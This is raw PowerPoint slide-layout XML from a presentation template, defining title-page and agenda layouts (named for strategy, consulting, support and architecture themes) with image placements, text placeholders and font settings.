        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="27432" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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46622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Page (Strategy A)">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0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="2227232"/>
            <a:ext cx="9144000" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21"/>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
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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25" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="5199730"/>
            <a:ext cx="7996525"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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2916310"/>
            <a:ext cx="5084425" cy="555626"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:defRPr sz="3600" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master Title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513294" y="3607675"/>
            <a:ext cx="5084424" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="27432" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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02214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Page (Strategy B)">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1" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="2227232"/>
            <a:ext cx="9144000" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2916310"/>
            <a:ext cx="7996526" cy="555626"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:defRPr sz="3600" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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513294" y="3607675"/>
            <a:ext cx="7996524" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="27432" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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4" name="Picture 13"/>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
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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8" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="5199730"/>
            <a:ext cx="7996525"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404297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Page (Consulting A)">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1" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3109" y="2227232"/>
            <a:ext cx="9144000" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513294" y="2916310"/>
            <a:ext cx="4114366"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513294" y="3607675"/>
            <a:ext cx="4114365"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4" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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513293" y="5199730"/>
            <a:ext cx="7996525"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13" name="Picture 12"/>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213021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Page (Consulting B)">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0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3109" y="2227232"/>
            <a:ext cx="9144000" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2916310"/>
            <a:ext cx="4758422"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513293" y="3607675"/>
            <a:ext cx="4758421"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7" name="Picture 16"/>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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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20" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="5199730"/>
            <a:ext cx="7996525"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="764348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fr-F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59FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5837275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Page (Support A)">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0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3109" y="2227232"/>
            <a:ext cx="9144000" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16"/>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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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20" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="5199730"/>
            <a:ext cx="7996525"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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2916310"/>
            <a:ext cx="5418380" cy="555626"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:defRPr sz="3600" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master Title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="3607675"/>
            <a:ext cx="5418379" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="27432" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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0590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Page (Support B)">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0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3109" y="2227232"/>
            <a:ext cx="9144000" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2916310"/>
            <a:ext cx="4711850"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513293" y="3607675"/>
            <a:ext cx="4711849"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7" name="Picture 16"/>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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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21" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="5199730"/>
            <a:ext cx="7996525"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365229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Agenda (Architecture)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192" y="1715"/>
            <a:ext cx="9141808" cy="6856285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 6" descr="C:\Users\victor.melniciuc\Desktop\==Work\MCS BOM\ppt\JPEGs (ready)\MYM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6915761" y="6344457"/>
            <a:ext cx="1886441" cy="176104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 3" descr="C:\Users\victor.melniciuc\Desktop\==Work\MCS BOM\assets\FAN2008058.JPG"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="email"/>
          <a:srcRect l="21453" t="16710" r="29526"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4743494" y="1005278"/>
            <a:ext cx="4398919" cy="5852722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4743494" y="0"/>
            <a:ext cx="2858244" cy="3733800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1005278"/>
            <a:ext cx="9144000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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513292" y="1184665"/>
            <a:ext cx="7088446"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dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2130628"/>
            <a:ext cx="3887212"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5"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg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5"/>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5"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to insert text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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2898978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Agenda (Architecture 2)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192" y="1715"/>
            <a:ext cx="9141808" cy="6856285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 6" descr="C:\Users\victor.melniciuc\Desktop\==Work\MCS BOM\ppt\JPEGs (ready)\MYM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6915761" y="6344457"/>
            <a:ext cx="1886441" cy="176104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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l="6426" r="18387"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4743494" y="1005278"/>
            <a:ext cx="4400506" cy="5852722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4743494" y="0"/>
            <a:ext cx="2858244" cy="3733800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1005278"/>
            <a:ext cx="9144000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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513292" y="1184665"/>
            <a:ext cx="7088445"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dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2130628"/>
            <a:ext cx="3887212"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5"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg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5"/>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5"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to insert text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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367158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Agenda (People)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192" y="1715"/>
            <a:ext cx="9141808" cy="6856285"/>
          </a:xfrm>
